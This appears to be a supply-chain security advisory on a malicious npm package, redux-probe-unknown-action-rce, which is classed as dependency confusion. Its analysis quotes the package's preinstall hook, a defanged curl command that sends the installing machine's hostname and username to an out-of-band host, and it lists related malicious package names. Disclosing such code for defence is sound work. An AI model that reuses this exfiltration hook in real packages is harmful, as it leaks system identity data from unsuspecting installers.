LWA-2026-4984 confirmed malware
redux-probe-unknown-action-rce@1.0.0
Malicious code in redux-probe-unknown-action-rce (npm)
T1059.004 · Unix ShellT1082 · System Information DiscoveryT1041 · Exfiltration Over C2 ChannelT1195.002 · Compromise Software Supply Chain
Analysis
A dependency-confusion targeting name with no functional code (index.js is an empty stub). Its preinstall hook runs `curl -X POST -d "info=$(hostname) $(whoami)" hxxp://d22bct11og85ukurvqe0fwmajus9fyr9j[.]oast[.]online` on every install, exfiltrating the victim's hostname and username to that out-of-band interaction endpoint. The package description calls itself a PoC, but there is no repository URL or program reference to verify any research claim.
- analyzed by
- Leitwacht
- first seen
- Jun 13, 2026, 04:23 AM
- analyzed
- Jun 13, 2026, 04:26 AM
Related advisories
- houzidawang806@1.0.1
- @wacrot/infra-data-kit@2.1.4
- prisma-callback@1.0.0
- poloman@9.2.1
- ect-839201@100.0.1
- pie-docs@4.31.0
- openclaw-preview@2026.6.1
- internallib_v856@99.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.